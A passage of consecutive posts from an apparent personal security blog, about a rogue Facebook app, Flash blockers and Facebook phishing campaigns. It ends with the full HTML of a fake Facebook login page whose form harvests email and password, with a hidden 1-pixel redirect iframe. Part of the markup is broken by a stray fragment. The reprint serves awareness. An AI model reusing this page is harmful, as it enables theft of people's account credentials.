Last week I was sitting in my office working away on a client’s iPhone app when my iPhone’s text message bell alert rang. I picked up my phone to see my daughter’s text message: “Free iPad event?” After an exchange, I learned that my Facebook account had sent her an event request with a link to a rogue quiz site that was offering quizzes for the amazingly low price of $19.99 a month. I also started getting emails from other friends who were getting the invitation from me.

So, I got mad.

First, I deleted the event. Then, I posted to my wall about it. And then, I went on the warpath.

You see, I am very careful about my Facebook account. While I explore aspects of Facebook as part of my research for clients, I am aware of the dangers and am diligent in working through the possible issues. But, I got caught. So, I went looking for the source of the issue.

The first thing I learned is that I am not alone. There is even a Facebook group that has grown up to oppose it. But, no one seemed to know how it was done, so I began to investigate.

Given the invitation text and the targets, I figured out that it had to have come from an application with access to my account. I dug through my entire list of applications, eliminating many that were either old or that I don’t use. But, it’s important to understand that Facebook makes this process far more painful than it needs to be. If only Facebook would make a note on the wall posts, event invites, and other items noting what application was used to create it, we could track down the reprobates who build these cheap cheats. Twitter even does it:

Twitter displays the source of the Tweet below the text

So Twitter, with its informal nature, trumps Facebook in one of the most important aspects of security: transparency.

In my next few posts, I’ll outline what you can do to scrub your Facebook account in a way that will make it much more hardened against this kind of attack. However, with the limited transparency of Facebook’s system right now, there is only so much you can do.

“Want a free iPad?” That’s an email that my Facebook friends received from me this morning. The problem is, I never sent it. In fact, I never saw it until it had been sent on my behalf. Being careful isn’t enough.

I wrote here on this very blog last year about the various trojans and other attacks made on and through Facebook.

Today, I was used.

This morning as I was starting work, my daughter sent a text message asking me about a free iPad. I didn’t know what she was talking about. Then, after a bit of investigation, I learned that some rogue application that I had approved for access to my Facebook account, had sent an event invitation to everyone on my Friends list.

This is a big deal.

It’s a big deal because I cannot even easily send a message to everyone on my friends list. Therefore, my apology email took a while to create, since I had to manually create a list with all of my friends on it.

It’s also a big deal because there was no way for me to find out from the invitations which application sent it. Was one of the seemly appropriate applications like Twitter or Foursquare the issue? Or how about that Fast Company Influence Project app that I set up yesterday? I can’t tell. The invitation does tell anyone how it was created, and I have no way of working backwards from the invitation to the app and removing its permissions.

This is a Facebook security problem, and Facebook needs to address it. As a result of this issue, I have removed a number of apps from my Facebook page and will remove all of them if it happens again.

In the meantime, I’m committed to doing what I can to track down this rogue app. If you have any insight into how this was done or what app might have done it, I’d love to get your insights. I’ll update this post as I discover more.

A Facebook conversation this week reminded me that many people do not know how damaging Adobe Flash can be on many systems, especially, it seems, those running Apple’s OS X. For many years, I have found Flash more annoying than anything, and so have run various plug-ins to keep Flash from loading in my browsers. There are also an additional mini-application that you may find useful.

First, there are a number of Flash blocking plug-ins for the various browsers available. For Firefox, there’s FlashBlock. Ffor Safari there’s ClickToFlash. For Google Chrome, there’s Kill-Flash. All of these plugins do the same thing: they replace the Flash elements on a page with a clickable image. If you don’t click, no Flash ever loads. If you do, Flash loads and plays.

One think I especially like about ClickToFlash is that you can adjust the settings to load H.264 videos on YouTube instead of Flash when it is available. Very nice.

In addition to these plug-ins, I also use BashFlash on my Macs. This little application sits quietly in the menubar until one of the Flash processes starts going crazy. Sometimes, a Flash process can cycle up and take over a computer. When one does this, BashFlash wakes up, turns red, and lets you kill the runaway Flash process.

Together, these plugins and app will make your browsing experience much more pleasant. I run ClickToFlash and Kill-Flash on my two most-used browsers, and keep BashFlash on hand, too. Let me know how it goes for you.

The word “Phishing” is used for sites that steal your identity, and there are more Phishing sites stealing Facebook login information today.

First thing this morning, I received a Facebook message with the subject “Hi” and the content “Look at redbuddy dot be”. Going to that site gets you the same kind of site as I reported in Facebook Trojan Attack earlier this week. Once again it’s obviously a phishing site, with language like, ”We helps you connect and share with the people in your life.” and yet people are still being sucked in!

Beware! Do not log in to any site that you don’t absolutely know is the site you want. Realize that any time you use your login, it can be compromised. I’m putting together a brief video on this that I plan to have ready this weekend.

For more insights on social media, check out my social media programs.

This morning, I received a facebook message that was short and questionable: “Check kirgo.at.” Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page:

Fake Facebook Page

While this page doesn’t look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message (“Check X.at.”). That’s how the Trojan propogates.

Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.

Here is the rule: Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials. Period.

Update: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good move start for Facebook, who are still so new at the game that there are a number of security holes in their systems.

If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>Login</title>
	<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" />
</head>
<body class="login_page ie7 UIPage_LoggedOut Locale_en_US">
<div id="dropmenu_container"></div>
<div id="nonfooter">
	<div id="page_height" class="clearfix">
		<div id="menubar_container">
			<div id="fb_menubar" class="fb_menubar_logged_out clearfix">
				<div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo" style="height:85px;"></li></ul></div>
				<div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div>
			</div>
			<div class="signup_box clearfix" style="height:25px;">
				<div class="UILinkButton UILinkButton_SUBig"><a href="/" class="UILinkButton_A">Sign Up</a>
					<div class="UILinkButton_RW">
						<div class="UILinkButton_R"></div>
					</div>
				</div>
				<span class="signup_box_message" style="padding-left:15px;">We helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container">
				<div class="title_header add_border"><h2 class="no_icon">Login</h2></div>
				<form method="POST" action="/?login_attempt=1">
				<div id="loginform" style="">
				<div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div>
				<div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
				<label class="persistent"><input type="checkbox" class="inputcheckbox " name="persistent" value="1" /><span>Remember me</span></label>
				<div id="buttons" class="form_row clearfix"><label></label>
				<input type="submit" value="Login" name="login" id="login" class="inputsubmit" /></div><p class="reset_password form_row"><label></label><a href="/">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><br><br><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP"></span><span id="rtime" title="130">&copy;</span> <span title="10.18.7.118">20</span><span title="17409680">09</span></div>
</div><div id="pagefooter_links"><ul i
1df
d="pagefooter_left_links"><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Advertising</a></li><li><a href="/">Careers</a></li><li><a href="/">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="/">Privacy</a></li><li><a href="/">Mobile</a></li><li><a href="/">Help</a></li></ul></div></div></div><iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe><font></font><font></font><font></font><font></font>
</body>
</html>

This is not the only domain name that is attempting this, either, so beware!